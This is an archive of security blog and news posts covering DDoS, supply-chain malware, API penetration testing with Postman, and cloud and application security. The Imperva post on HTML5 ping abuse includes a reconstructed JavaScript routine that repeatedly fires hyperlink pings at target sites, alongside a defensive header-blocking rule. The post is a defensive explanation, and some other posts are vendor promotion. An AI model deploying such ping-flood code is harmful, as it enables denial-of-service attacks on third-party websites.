Category Archives: Application Security

Casino Goes All In and Wins Big with Imperva Security

There’s no good time to be hit by ransom-seeking DDoS attackers. For one casino-entertainment provider, the timing was particularly bad — right before one of its largest online poker events in 2016.

The casino, which generates multiple billions in revenue per year, leveraged Imperva’s emergency onboarding service, allowing us to onboard them to our DDoS Protection service within minutes.

(More Imperva customer case studies are available here.)

Sure enough, the casino was targeted with DDoS attacks throughout the weekend, all of which Imperva successfully mitigated within 10 seconds (we are the only service provider with an SLA-backed guarantee to detect and block any website attack, of any size or duration, in 10 seconds or less).

Mitigating these attacks led the casino to go all in on Imperva, moving all of its sites and traffic to Imperva’s Cloud Application Security and completely replacing competing solutions.

The casino now uses Cloud WAF, CDN, DDoS Protection and Global Site Load Balancing. Once it saw the strength of our WAF solutions, it quickly adopted our Database Security offerings as well, and now uses our Data Risk Analytics and Data Activity Monitoring to provide a full defense-in-depth solution. It is also considering our upcoming Cloud Data Security offering (currently in beta; sign up here).

While we first won this customer a few years ago, we’ve continued to expand our business and services provided to them (which all of our customers can take advantage of with our FlexProtect plans). No poker face can hide the satisfaction of making a competitor fold by simply demonstrating a customer-first mindset.   

Imperva protected the casino’s business first and discussed contracts second. This showed the casino that we are a true partner in protecting their business.


Is your organization, like this casino, looking to implement a full defense-in-depth security strategy for ultimate protection? Check out this recently recorded webinar, “Five Best Practices for Application Defense in Depth,” featuring Forrester security analyst Amy DeMartine, Imperva SVP and Fellow, Terry Ray, and Imperva CTO, Kunal Anand.

The post Casino Goes All In and Wins Big with Imperva Security appeared first on Blog.

SecurityWeek RSS Feed: Bad Bots Steal Accounts, Content and Skew the Web Ecosystem

Bad bots are a continuing problem. Good bots, those that perform benign activities (such as search engine crawlers like Googlebot and Bingbot), are welcome. Bad bots, those that scrape and steal content, mine for competitive data, and undertake credential stuffing, ad fraud, transaction fraud and more, are not.



Google introduces many G Suite security enhancements

Last week, the big news from Google Cloud Next 2019 was that phones running Android 7.0 or higher can be turned into a security key for G Suite account 2-step verification. But at the event Google also announced a number of G Suite enhancements, many of which are aimed at improving user and enterprise security. Some of the features are still in beta. Some are available to users of all G Suite editions, others only …

The post Google introduces many G Suite security enhancements appeared first on Help Net Security.

What Happens When Malware Sneaks Into Reputable Hardware, Applications and App Stores?

To avoid malware, you should always get hardware and software from official, authorized and reputable sources and vendors, right? But what happens when those same sources actually contain or deliver malicious payloads?

In recent months, such bad code has appeared out of the box in mobile hardware and in reputable and seemingly legitimate apps from authorized app stores. Perhaps it’s time for a more sophisticated and nuanced policy.

Malicious code is a widespread, harmful and growing problem, and threat actors are increasingly targeting businesses and enterprises, according to Malwarebytes “2019 State of Malware” report. The report found that business detections of malware increased nearly 80 percent over the last year, with the largest increases coming from Trojans, riskware tools, backdoors and spyware.

The report also detailed a growing creativity and sophistication in delivery — including the Holy Grail of attack vectors: delivery through official, authorized and reputable sources. Let’s explore some recent examples.

Digitally Signed, Directly Delivered Malware

Hundreds of thousands of ASUS computers were recently infected by malicious code in an attack campaign known as Operation ShadowHammer. (ASUS has since removed the code with a security update.)

The infection didn’t come by way of insecure websites or email phishing attacks. Instead, it arrived via the ASUS Live Update tool and was authenticated by the company’s legitimate code-signing certificates. The CCleaner-like backdoor scanned for each victim’s media access control (MAC) address, hunting for one of 600 targeted MAC addresses. Once a target machine was identified, a malicious payload of unknown purpose was loaded from a remote server.

This entire series of events began with attackers gaining access to ASUS’ certificates, which were used to sign the code through ASUS’ supply chain, according to researchers from both Kaspersky Lab and Symantec.

Operation ShadowHammer has won instant fame as the poster child for the growing threat of supply chain attacks in which malicious items are installed during a product’s manufacturing, at some point between assembly and reception by the customer, or while being updated with signed and authorized software updates.

Can You Pick Up Some Malware From the (App) Store?

Another efficient way to deliver malware is through applications. This is easiest from unauthorized app stores because they have less sophisticated — or nonexistent — checks for bad code.

But it’s also common for malware to slip past those checks on legitimate app stores. An analysis by Check Point researchers found a particular strain of adware in 206 Android apps on the Google Play store, which were collectively downloaded around 150 million times. These apps were compromised by SimBad malware, embedded in a software development kit (SDK) used by the apps.

According to Google, the install rate of potentially harmful applications (PHA) from Google Play was around 0.04 percent in 2018. However, that very low rate shouldn’t give comfort; it simply means a PHA install rate of one out of every 2,500 downloads. Therefore, a company with thousands of employees is likely to have at least some PHAs inside its firewall.
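To put that rate in perspective, here’s a quick back-of-the-envelope check. The company size and per-employee app count below are made-up figures for illustration only; neither comes from the Google report.

```javascript
// 0.04 percent expressed as a fraction, per Google's 2018 figure.
const phaRate = 0.0004;
const downloadsPerPha = Math.round(1 / phaRate);  // one PHA per N downloads

// Hypothetical company, purely for illustration: 5,000 employees each
// installing roughly 50 apps over a device's lifetime.
const employees = 5000;
const appsPerEmployee = 50;
const expectedPhas = Math.round(employees * appsPerEmployee * phaRate);

console.log(downloadsPerPha);  // 2500
console.log(expectedPhas);     // 100
```

Even at a “very low” rate, a large workforce can be expected to accumulate a non-trivial number of potentially harmful apps behind the firewall.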

In another example, a compromised but otherwise legitimate weather forecast app, developed by Alcatel’s parent company, the TCL Corporation, was available as a standalone app on the Google Play store and downloaded more than 10 million times. The weather app harvested user data, such as location, email address, International Mobile Equipment Identity (IMEI) codes and other information, and sent it to a remote server. The app also subscribed victims to phone number services that incurred charges on phone bills.

What’s more, Alcatel bundled the app on its Pixi 4 and A3 Max smartphones, meaning brand-new phones purchased through legitimate channels actually contained the malware.

To date, it’s unclear how exactly the malicious code got into the weather app. The leading theory appears to be that the PC used by a TCL developer was hacked.

The Worst Thing About Bad Code From Good Sources

Matt Blaze, professor of law and computer science at Georgetown University, wrote in a New York Times opinion piece that despite attacks such as Operation ShadowHammer, it’s still more important than ever to keep software up to date.

In fact, according to Blaze, the most dangerous aspect of the ASUS supply chain attack is the risk that people might turn off automatic updates and avoid installing critical patches.

“It might be tempting to immediately disable these mechanisms … but that would be a terrible idea, one that would expose you to far more harm than it would protect against,” wrote Blaze. “In fact, now would be a fine time to check your devices and make sure the automatic system update features are turned on and running.”

It’s also worth noting that such attacks are far more likely with the prevalence of internet of things (IoT) devices. The future of IT will probably involve far more malicious payloads in legitimate products from authorized sources, but it’s still as important as ever to favor the authorized source over the unauthorized.

Lastly, organizations should always add an extra layer of security by monitoring third-party connections with a unified endpoint management (UEM) solution. The official source, the authorized source and the reputable source are only the first line of defense against increasingly aggressive and creative malware threats, and will continue to function as such. The next lines of defense are up to you.

The post What Happens When Malware Sneaks Into Reputable Hardware, Applications and App Stores? appeared first on Security Intelligence.

The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack

DDoS attacks have always been a major threat to network infrastructure and web applications.

Attackers are always creating new ways to exploit legitimate services for malicious purposes, forcing us to constantly research DDoS attacks in our CDN to build advanced mitigations.

We recently investigated a DDoS attack which was generated mainly from users in Asia. In this case, attackers used a common HTML5 attribute, the <a> tag ping, to trick these users into unwittingly participating in a major DDoS attack that flooded one web site with approximately 70 million requests in four hours.

The attack relied not on a vulnerability, but on turning a legitimate feature into an attack tool. Also, almost all of the users enlisted in the attack were mobile users of QQBrowser, developed by the Chinese tech giant Tencent and used almost exclusively by Chinese speakers. It should be noted, though, that this attack could have involved users of any web browser, and recent news suggests these attacks will continue to grow; we’ll explain why later in the article.

How They Did It

Ping is an HTML5 attribute that specifies a list of URLs to be notified when the user follows a hyperlink. When the user clicks the hyperlink, a POST request with the body “ping” is sent to each URL specified in the attribute. The request also includes the headers “Ping-From” and “Ping-To” and a “text/ping” content type.

This attribute is useful for website owners to monitor/track clicks on a link. Read more here.

A simple HTML page containing a link with “ping” attribute
A POST request with the “ping” body
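The shape of that request can be sketched in code. This is an illustration only: the URLs are placeholders, and buildPingRequest is a hypothetical helper, not a browser API; the header names follow the HTML specification and the body text follows the description above.

```javascript
// Sketch of the POST request a ping-enabled browser sends when a link like
//   <a href="https://example.com" ping="https://tracker.example/ping">
// is clicked. One such request is sent per URL in the ping attribute.
function buildPingRequest(pingUrl, fromUrl, toUrl) {
  return {
    url: pingUrl,            // a URL listed in the ping attribute
    method: "POST",
    headers: {
      "Content-Type": "text/ping",
      "Ping-From": fromUrl,  // the page containing the link
      "Ping-To": toUrl,      // the link's href
    },
    body: "ping",
  };
}

const req = buildPingRequest(
  "https://tracker.example/ping",
  "https://page.example/article",
  "https://example.com"
);
console.log(req.method, req.headers["Ping-To"]); // POST https://example.com
```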

Notification services using ping are not new. The Pingback feature in the popular WordPress CMS notifies a web site owner if a link is clicked. Attackers have used Pingbacks to conduct DDoS attacks by sending millions of requests to vulnerable WordPress instances that are then forced to “reflect” the pingback requests onto the targeted web site.

Besides using the HTML5 ping, this DDoS attack also enlisted mostly mobile users from the same part of the world. While we’ve observed mobile browser-based attacks before, a DDoS attack mostly using the same mobile browser and from the same region is very uncommon.

About 4,000 user IPs were enlisted in the attack, with a significant percentage from China. They generated a peak of 7,500 requests per second (RPS) during the four-hour attack, producing 70 million requests overall.
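Those figures are self-consistent, as a quick calculation shows:

```javascript
// Sanity check on the attack figures above (illustrative arithmetic only).
const totalRequests = 70_000_000;
const durationSeconds = 4 * 60 * 60;  // the four-hour attack window
const enlistedIps = 4000;

const averageRps = Math.round(totalRequests / durationSeconds);
const perUserRps = totalRequests / enlistedIps / durationSeconds;

console.log(averageRps);             // 4861 -- well under the 7,500 RPS peak
console.log(perUserRps.toFixed(2));  // 1.22 -- roughly one ping per user per second
```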

Diving into the logs to understand the attack, we noticed that all the malicious requests contained the HTTP Headers “Ping-From” and “Ping-To”. This was the first time we had seen a DDoS attack that utilized the <a> tag ping attribute.

Both the Ping-From and Ping-To values referred to the “” URL.

A sample of the requests that were generated by the DDoS attack

This suspicious URL contains a very simple HTML page with two external JavaScript files: “ou.js” and “yo.js”.

“ou.js” had a JavaScript array containing URLs — the targets of the DDoS attack.

“ou.js” JavaScript source code

“yo.js” had a function that randomly selects a target from the array and creates an <a> tag with a “ping” attribute pointing to the target URL.

Every second, an <a> tag was created and clicked programmatically, causing a “ping” request to be sent to the target website.

Legitimate users who were tricked into visiting this suspicious website unwillingly participated in a DDoS attack, and the pings continued to be generated for as long as a user stayed on the page.

“yo.js” JavaScript source code
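Taken together, the behavior of the two scripts can be sketched as follows. This is a hedged reconstruction based on the description above, not the actual attack code: the target URLs are placeholders, and pickTarget and firePing are illustrative names.

```javascript
// Reconstruction of the described attack logic: every second, pick a
// random target from the array (the role of "ou.js") and create and click
// an <a> tag whose ping attribute points at it (the role of "yo.js").
const targets = [
  "https://victim-a.example/",
  "https://victim-b.example/",
];

// Pure helper so the selection logic can be exercised without a DOM.
function pickTarget(urls, random = Math.random) {
  return urls[Math.floor(random() * urls.length)];
}

// DOM portion (browser only): creates and clicks the ping-carrying link.
function firePing(targetUrl) {
  const a = document.createElement("a");
  a.href = "https://harmless.example/";  // where the click appears to go
  a.ping = targetUrl;                    // where the POST ping is sent
  document.body.appendChild(a);
  a.click();
  a.remove();
}

// In a browser, the attack loop would then be:
//   setInterval(() => firePing(pickTarget(targets)), 1000);
```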

The question is: How did the mastermind keep users on this web site in order to keep triggering the ping requests and maintain the ferocious DDoS attack?

We noticed that the User-Agent in the requests is associated with the popular Chinese chat app WeChat. WeChat opens links in messages with the device’s default mobile browser, and since QQBrowser is very popular in China, many users pick it as the default browser for their smartphone.

Our theory is that social engineering, combined with malvertising (malicious advertising), tricked unsuspecting WeChat users into opening the browser. Here’s one possible scenario:

  1. The attacker injects malicious advertising that loads a suspicious website
  2. A link to the legitimate website, with the malicious ad in an iframe, is posted to a large WeChat group chat
  3. Legitimate users visit the website with the malicious ad
  4. JavaScript code executes, creating a link with the “ping” attribute that the user clicks on
  5. An HTTP ping request is generated and sent to the target domain from the legitimate user’s browser

Final Words

While QQBrowser was overwhelmingly used in this DDoS attack due to its popularity with WeChat users, other web browsers can also be exploited by this ping attack. Worse, browser makers are taking steps that make it harder for users to turn off the ping feature, which would otherwise let them avoid being enlisted in such an attack.

According to an article earlier this week on the tech news site Bleeping Computer, newer versions of Google Chrome, Apple’s Safari and Opera no longer let you disable hyperlink auditing, aka pings. This is a concern for web architects and security pros worried that this method of launching DDoS attacks will spread.

Fortunately, web site and application operators have some control. If you are not expecting or do not need to receive ping requests to your Web server, block any Web requests that contain “Ping-To” and/or “Ping-From” HTTP headers on the edge devices (Firewall, WAF, etc.). This will stop the ping requests from ever hitting your server. (Note: Imperva DDoS Protection is already updated to prevent ping functionality abuse targeted at your sites.)
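As a sketch of that edge rule in application code, here is what the check might look like in a Node.js service. The function names isPingRequest and blockPings are illustrative, and on a real deployment you would apply the equivalent rule on the firewall or WAF rather than in the application itself.

```javascript
// Drop any request carrying hyperlink-auditing headers before it
// reaches the application.
function isPingRequest(headers) {
  // HTTP header names are case-insensitive; normalize before matching.
  const names = Object.keys(headers).map((h) => h.toLowerCase());
  return names.includes("ping-to") || names.includes("ping-from");
}

// Express-style middleware wrapper (Express itself is not required
// for the check; the same predicate works with node's http module).
function blockPings(req, res, next) {
  if (isPingRequest(req.headers)) {
    res.statusCode = 403;  // reject ping requests outright
    res.end();
    return;
  }
  next();
}

console.log(isPingRequest({ "Ping-To": "https://victim.example/" })); // true
console.log(isPingRequest({ accept: "text/html" }));                  // false
```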

Application DDoS attacks are here to stay and will continue to evolve at incredible rates. Attackers are always finding new and creative ways to abuse legitimate services for malicious purposes. At Imperva, we are dedicated to detecting and combating these threats on your behalf.

The post The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack appeared first on Blog.

Better API Penetration Testing with Postman – Part 3

In Part 1 of this series, we got started with Postman and generally creating collections and requests. In Part 2, we set Postman to proxy through Burp Suite, so that we could use its fuzzing and request tampering facilities. In this part, we will dig into some slightly more advanced functionality in Postman that you almost certainly want to leverage.

Collection Variables

Variables in Postman can be used in almost any field in the request. The syntax is to use double curly-braces on either side of them. There are a few places I can define them. If they’re relatively static, maybe I set them as collection variables. For example, I’ve been using http://localhost:4000 as my test host. If I change the test API’s port from 4000 to 4001, I don’t want to have to edit the URL of each request. Here’s how to move that into a Collection variable. First, I open the edit dialog for that collection on the Collections list in the menu side-bar. I can either click the ... button or right-click the collection name itself. In either case, I get the same context menu, and I want to choose Edit.

This will open a dialog for editing the collection. The default view has the name of the collection and a description textbox, but there’s also a row of tabs between those two fields.

One of those tabs is called Variables. That’s the one we want; clicking it will open another dialog, for editing variables.

Postman collection variable editing interface

It has a grid containing a Variable column for the variable name, an Initial Value column, and a Current Value column. The difference between the two value columns relates to syncing through Postman’s paid features. What matters here is that you enter the initial value and then tab into the current value field. This automatically populates the initial value into the current value field, and it will look as pictured. Now I have a collection variable called api_host, with a value of http://localhost:4000. I’m done editing variables, so I click the Update button.

It’s time to modify my requests to reference that variable instead of having their own hard-coded hostname and port.

Postman request, with the URL changed to point to a variable

I simply replace the applicable part of each URL with the placeholder: {{api_host}}
Hovering over the placeholder expands it to show the value and scope. There’s some color-coding here to help us out too: the text turns orange when the variable is valid, but would be red if I put an invalid variable name in.

I still have to update each request this once, to make them use the variable. But in the future, if the port changes, if the API switches to HTTPS, or if I deploy my test API to a completely different host, I can just go back into my collection variables and update the values there, and my requests will all receive the change accordingly.

Now collection variables are fine for relatively static bits that won’t change much, but what if I’m testing multiple environments, deployments, or even multiple tenants in a multi-tenant solution? It’s likely I’ll want to use the same collection of requests but with different sets of variables. Environment Variables deal with that problem.

Environment Variables

You may have already noticed their interface on the top-right of the window. Let’s take a look:

Environment variable interface in Postman
  1. Environment selector drop-down, for choosing the active environment.
  2. Quick-look button, to take a peek at what’s set in your environment
  3. Manage Environments button, where the real editing happens.

To get started, we’ll want to click the Manage Environments button. That will open a large, but relatively empty dialog, with an Add button at the bottom. Click the Add button.

You will be presented with another dialog. This one looks almost the same as the Collection Variables dialog, except that it takes a name.

I’ve named mine LocalTest.

I’ve also added two variables: one called bearer_token, with a value of foo, and the other called user_id, with a value of 1.

Once I’ve finished editing, I click the Add button near the bottom of the dialog, and then close out of the Manage Environments dialog. There’s one final, important, oft-forgotten step before I can use the variable in this environment. I need to choose it from the Environment selector drop-down.

And now these additional variables are accessible in the same way as the api_host was above: {{bearer_token}} and {{user_id}}

Route Parameters

It’s common on modern APIs to use route parameters. Those are values supplied as part of the main path on the URL. For example, consider the following: http://localhost:4000/user/42/preferences

The number 42 in a URL like that is actually a parameter, most likely a user ID in this example. When the server-side application routes the incoming request, it will extract that value and make it readily available to the function or functions that ultimately handle the request and construct the response. This is a route parameter. It may be convenient to make this easily editable in Postman. The syntax for that is simply to put it directly into the URL in the form of a colon (:) followed by the parameter name. For this example request in Postman, I would enter it as {{api_host}}/user/:userId/preferences. Then, on the Params tab of the request, I can see it listed and set its value. In the image below, I set it to the user_id variable that I specified in the environment variables earlier.

I could have written my variable directly into the URL as well, but this way is cleaner, in my opinion.

Bearer Tokens

Imagine a scenario where you issue some sort of auth request, it responds with a bearer token, and then you need to use that token in all of your other requests. The manual way to do it would probably be to just issue the auth request, and then copy and paste the token from the response into an environment variable. All the other requests can then use that environment variable.

That will work okay, but it can be a pain if you have a token with a short lifespan. There’s a more elegant solution to this problem. Consider the following response:

We’ve issued our request and received a JSON response containing our token. Now I want to automate the process of updating my environment variable with the new bearer token. On the requests interface, there are several tabs. The one furthest to the right is called Tests. This is mainly for automatically examining the response to determine if the API is broken, like a unit test. But we can abuse it for our purpose with just a couple of JavaScript statements.
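A minimal sketch of such a Tests-tab script, assuming the auth endpoint returns JSON with a token field (the field name will vary by API). The parsing step is written as a plain function here so it can be read and run outside Postman; the commented pm.* lines show the equivalent calls inside the Tests tab.

```javascript
// Copy a bearer token out of an auth response body. Assumes the body
// looks like {"token": "..."}; adjust the field name to match your API.
function extractToken(body) {
  return JSON.parse(body).token;
}

// Inside Postman's Tests tab, the equivalent two lines would be:
//   const json = pm.response.json();
//   pm.environment.set("bearer_token", json.token);

console.log(extractToken('{"token": "foo"}')); // foo
```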

I add the script above, click Save, and then run my request again. And it appears that everything happened exactly the same as the first time. But if I use the Quick Look button to see my environment variables…

I can see that the Current Value has been updated automatically. That’s the first step: I now have the value stored in a place I can easily reference, but it doesn’t put the bearer token on my requests for me. I have two options for that. The first is that if I go to the request’s Authorization tab, I can set a bearer token from the type drop-down and point it at my variable.

This approach is alright, but then I need to remember to set it on each request. But the default Authorization Type on each new request is Inherit auth from parent. The parent, in this case, is the Collection. So if I switch this request back to that default type, I can then go into the Edit Collection settings (same context menu as I went to for Collection variables), and go to the Collection’s Authorization tab.

It presents almost the same interface as the Authorization on the request, and I can set it the same way. The difference now is that it’s managed in one place – in the collection. And every new request I create will include that bearer token by default, unless I specifically change the type on that request. For example, my Authentication request likely doesn’t need the bearer token, so I might then set the type to No Auth on that request’s Authorization tab.

Occasionally, I run into applications where an XML or HTML body is returned containing the value that I want to extract. In those cases, the xml2Json function, which is built-in, is helpful for parsing the response.

Using xml2Json to marshal an HTML body into a JSON object

As one more note, there is the Pre-request Script tab, which uses the same basic scripting interface. As you might expect, it executes before the request is sent. I know some of my colleagues use it to set bearer tokens, which is a totally valid strategy, just not the approach I use. It can also be helpful when you need a nonce, although that’s again not something I typically encounter.

Next Steps

In Part 4, we will wrap up the series by incorporating some Burp Suite extensions to really power-up our penetration testing tool-chain. But this whole series is really dealing with tooling. There is a lot of background knowledge that can be a huge difference-maker for API testing, from a good understanding of OAuth, to token structures like JWT and SAML, to a really good understanding of CORS.

How to Balance Speed and Security in Your Application Security Program

In today’s ever-evolving digital trust landscape, the term DevOps has become synonymous with speed. If you want to compete, you need to build quality code quickly. Yet as quickly as companies are able to innovate, the bad guys are constantly developing new ways to exploit vulnerable applications.

With that in mind, business leaders and security managers need an application security solution that integrates into the software development life cycle (SDLC) to maintain speed to market. However, there is a delicate balance between security and speed, and striking it is an exercise in understanding your objectives and risks and empowering your developers to lead the charge.

Understand Your Application Security Objectives

If your priority is to simply check the box, so to speak, to satisfy regulatory requirements, it’s important to consider that compliance does not always equal security. That’s not to say achieving compliance is a fast or easy task, but if your goal is to prevent a breach by writing secure software, you need to go beyond just compliance.

Most regulatory requirements are painted with a broad brush and don’t take the nuances of your application into consideration. Compliance is a point-in-time endeavor to check a specific set of requirements that could quickly become irrelevant given the lightning-fast pace of application development. That’s why instituting security throughout the development pipeline is crucial to delivering secure code on time. When security is baked into your application’s DNA from the start, compliance should come easy. Furthermore, you can set yourself apart from the rest of the market by establishing security policies based on the needs of the business.

What Makes a Balanced AppSec Program?

There’s a common misconception that only certain types of application testing can match the speed of Agile or DevOps methodologies. Because of this, many organizations will settle for the type of application testing solution they think satisfies their delivery timelines.

There is no single magic bullet that will provide end-to-end security coverage across your entire app portfolio. Static analysis cannot test for broken authentication, just like dynamic analysis cannot test for insecure data flows. It takes a balanced approach to testing and leveraging different technologies to have a fully mature application security program.

The good news is that application security technology has advanced leaps and bounds over the last decade and is shifting left with the rest of the industry. Static analysis can be integrated at the earliest stages of the development life cycle, and dynamic analysis can be applied to QA testing and even functional testing to only check for certain code changes. Taking the time to understand your risk tolerance and adopting the right blend of technologies can help ensure that you’re delivering quality secure code on time.

Empower Your Developers to Be Security Standard-Bearers

Part of the nuance of balancing security and speed is finding security flaws quickly so you can remediate rapidly. You may have had a high school coach or teacher who taught you how to fail so that you may learn from your mistakes. The same applies to security.

It’s important to recognize real security vulnerabilities early and have an action plan in place to remediate them before they are pushed into production. A major component of this approach is a development team that is backed by a thorough security training curriculum and empowered to take remediation into its own hands. For starters, consider the most common recurring security flaws across your applications, such as SQL injection or cross-site scripting (XSS), and develop a pointed training curriculum to educate developers on recognizing and remediating those flaws accordingly.

Take the time to understand the different types of vulnerabilities and their context within your applications’ design. Naturally, you’ll want to address any high-severity flaws, but also consider whether they can be exploited by an attacker. Is this a critical vulnerability? Is the function within the call path of the application? Chances are, there are dozens of medium-severity vulnerabilities that have a higher risk of exploitation than any of the high-severity ones.

All Apps Are Not Created Equal

Not all applications are created equal, because all applications do not pose the same level of risk across the board. You need to have a way to manage and prioritize your risks — not to mention scarce resources — across your application landscape.

Unfortunately, we don’t live in a perfect world. However, having a grasp of your application landscape, applying the right technology in the right place and empowering your developers to take ownership of secure coding practices will ensure that you don’t have to pick sides in balancing speed and security.

Read our e-guide to learn more

The post How to Balance Speed and Security in Your Application Security Program appeared first on Security Intelligence.

Is Cloud Business Moving too Fast for Cloud Security?

As more companies migrate to the cloud and expand their cloud environments, security has become an enormous challenge. Many of the issues stem from the reality that the speed of cloud migration far surpasses security’s ability to keep pace.

What’s the holdup when it comes to security? While there’s no single answer to that complicated question, there are many obstacles that are seemingly blocking the path to cloud security.

In its inaugural “State of Hybrid Cloud Security” report, FireMon asserted that not only are cloud business and security misaligned, but existing security tools can’t handle the scale of cloud adoption or the complexity of cloud environments. A lack of security budget and resources compounds these concerns.

What Are the Risks of Fast-Paced Cloud Adoption?

Of the 400 information security professionals who participated in the survey, 60 percent either agreed or strongly agreed that cloud-based business initiatives move faster than the security organization’s ability to secure them. Another telling finding from a press release associated with the report is that 44 percent of respondents said that people outside of the security organization are responsible for securing the cloud. That means IT and cloud teams, application owners and other teams are tasked with securing cloud environments.

Perhaps it’s coincidental, but 44.5 percent of respondents also said that their top three challenges in securing public cloud environments are lack of visibility, lack of training and lack of control.

“Because the cloud is a shared security model, traditional approaches to security aren’t working reliably,” said Carolyn Crandall, chief deception officer at Attivo Networks. “Limited visibility leads to major gaps in detection where an attacker can hijack cloud resources or steal critical information.”

While the emergence of the cloud has enabled anytime, anywhere access to IT resources at an economical cost for businesses, cloud computing also widens the network attack surface, creating new entry points for adversaries to exploit.

The Misery of Misconfiguration

As cloud-based businesses continue to quickly spin up new environments, misconfiguration issues have resulted in security nightmares, particularly over the last several months. According to Infosecurity Magazine, a misconfiguration at a California-based communications provider left 26 million SMS messages exposed in November 2018, and in December 2018, IT misconfigurations exposed the data of more than 120 million Brazilians.

From Amazon Web Services (AWS) bucket misconfigurations to Elasticsearch or MongoDB blunders, companies across all sectors have had their names in headlines not because of a data breach, but because human error left plaintext sensitive data exposed, often without a password.

Getting Cloud Security up to Speed

As is most often the case, the ability to enhance cloud security comes down to the availability of resources — 57.5 percent of respondents to the FireMon survey said that less than 25 percent of the security budget is dedicated to cloud security.

It’s also time to move beyond the misconception that cloud providers are delivering security in the cloud.

“Organizations new to the cloud will typically think that the cloud provider handles security for them, so they are already covered. This is not true; the AWS Shared Security Model says that while AWS handles security of the cloud, the customer is still responsible for handling security in the cloud. Azure’s policy is similar,” said Nitzan Miron, vice president of product management, application security services at Barracuda.

In short, securing all the applications and databases running in cloud environments is the responsibility of the business. That’s why organizations need to start thinking differently about their security frameworks and how to design controls that will secure a complex, borderless environment. Within that evolving security framework, organizations not only need strategies for scalable threat detection across cloud environments, but the endpoints accessing those cloud environments also need to be able to detect threats.

“Reducing risk will require adding capabilities to monitor user activity in the cloud, unauthorized access, as well as any malware infiltration. They will also need to add continuous assessment controls to address policy violations, misconfigurations, or misconduct by their suppliers and contractors,” Crandall said.

DevSecOps to the Rescue?

Another reason cloud security is lagging is rooted in the highly problematic division of teams. According to Miron, it’s often the case that security teams are separate from Ops/DevOps teams, which causes security to move much slower.

When the DevOps team decides to move to the cloud, it may be months before the security team gets involved to audit what they are doing.

“The long-term solution to this is DevSecOps,” said Miron.

Let it not be lost on anyone that “Sec” is planted right between “Dev” and “Ops.” When it comes to development, security is not something that can be tacked on at the end. It has to be central to the DevOps process.

From database exposure to application vulnerabilities, security in the cloud is complicated; and the complexities are compounded when teams don’t have adequate resources. Businesses that want to advance cloud security at scale need to invest in both the people and the technology that will reduce risks.

The post Is Cloud Business Moving too Fast for Cloud Security? appeared first on Security Intelligence.

Clouded Vision: How A Lack Of Visibility Drives Cloud Security Risk

Enterprises continue to migrate to the cloud with many using their cloud environments to support mission critical applications. According to RightScale, enterprises are on average running 38 percent of their workloads

The post Clouded Vision: How A Lack Of Visibility Drives Cloud Security Risk appeared first on The Cyber Security Place.

Identity-Defined Security is Critical in a Digital Transformation World

In an economy driven by information, data has always been every organization’s most important asset, and cyber-criminals know this, which is why they almost always start an attack by compromising

The post Identity-Defined Security is Critical in a Digital Transformation World appeared first on The Cyber Security Place.

Making Our Security Portfolio Simpler — and Better

Since its inception in 2009, Incapsula has been a proud part of Imperva, the analyst-recognized cybersecurity leader.

However, cybersecurity needs are evolving, and so are we.

On April 7th, we will officially retire the Incapsula web site. All of the great Incapsula web site content that wasn’t already migrated to the Imperva web site will move on that date. You can continue to access Incapsula Cloud Application Security product functionality and features from the Imperva web site, as well as access customer support.

Also, we will not be signing up any new customers to legacy Incapsula web plans. Incapsula features are now part of our Application Security offering, which is available through our new FlexProtect licensing plans and in the AWS marketplace.

For existing customers and partners, we’re ensuring the transition will be as smooth as possible. There will be no changes to:

  • the Incapsula Cloud WAF product itself (only the web site is changing);
  • customer plans — customers will get to keep their existing plan as-is;
  • users. While the login will move to the Imperva web site, the experience for existing MY users, as well as for APIs and other devOps projects, will NOT change;
  • the Incapsula Terms of Use and Privacy Policy;
  • the availability of Incapsula documentation and support, which you will be able to find by signing into the support page.

We’re simplifying our product portfolio and unifying our digital assets to ensure a better, more consistent customer experience for all. This ensures that we can continue to be your champion in the fight to secure data and applications, and defend your business growth, today AND tomorrow.

If you have any questions, please contact us via our Web site or your local account manager. Thank you for joining us as we continue our transformation into the New Imperva.

The post Making Our Security Portfolio Simpler — and Better appeared first on Blog.

The security challenges that come with serverless computing

Serverless computing (aka Function-as-a-Service) has been a boon to many enterprises: it simplifies the code development and deployment processes while improving utilization of server resources, minimizing costs and reducing security overhead. “Serverless infrastructure adoption is growing faster than most people realize,” says Doug Dooley, COO of modern application security provider Data Theorem. “It is outpacing virtual container (e.g., Docker) adoption by more than 2X in the past 4 years. And the impact of this rapid …

The post The security challenges that come with serverless computing appeared first on Help Net Security.

Not just for Processing: How Kafka Streams as a Distributed Database Boosted our Reliability and Reduced Maintenance


The Apache Kafka Streams library is used by enterprises around the world to perform distributed stream processing on top of Apache Kafka. One aspect of this framework that is less talked about is its ability to store local state, derived from stream processing.

In this blog post we describe how we took advantage of this ability in Imperva’s Cloud Application Security product. Using Kafka Streams, we built shared state microservices that serve as fault-tolerant, highly-available Single Sources of Truth about the state of objects in the system, which is a step up both in terms of reliability and ease of maintenance.

If you’re looking for an alternative approach to relying on a single central database to maintain the formal state of your objects, read on…

Why we felt it was time for a change for our shared state scenarios

At Imperva, we need to maintain the state of various objects based on the reports of agents (for example: is a site under attack?). Prior to introducing Kafka Streams, we relied in many cases on a single central database (+ Service API) for state management. This approach comes with its downsides: in data-intensive scenarios, maintaining consistency and synchronization becomes a challenge, and the database can become a bottleneck or be prone to race conditions and unpredictability.

Illustration 1: typical shared state scenario before we started using Kafka and Kafka Streams: agents report their views via an API, which works with a single central database to calculate the updated state

Enter Kafka Streams – shared state microservices creation made easy

About a year ago, we decided to give our shared state scenarios an overhaul that would address these concerns. Kafka Streams immediately came to mind, being scalable, highly available and fault-tolerant, and providing the streams functionality (transformations / stateful transformations) that we needed – not to mention Kafka being a reliable and mature messaging system.

At the core of each shared state microservice we built was a Kafka Streams instance with a rather simple topology. It consisted of 1) a source, 2) a processor with a persistent key-value store, and 3) a sink:

Illustration 2: default topology for our shared state scenario microservices’ streams instances. Note there’s also a store used for persisting scheduling metadata, which will be discussed in a future post

In this new approach, agents produce messages to the source topic, and consumers, e.g. a mail notification service, consume the calculated shared state via the sink topic.

Illustration 3: new flow example for a shared state scenario: 1) agent produces message to source topic in Kafka; 2) shared state microservice (using Kafka Streams) processes it and writes calculated state to sink topic in Kafka; and 3) consumers consume the new state

Hey, that built-in key-value store is quite useful!

As mentioned above, our shared state scenario’s topology includes a key-value store. We found several uses for it, and two of these are described below.

Use case #1: using the key-value store in calculations

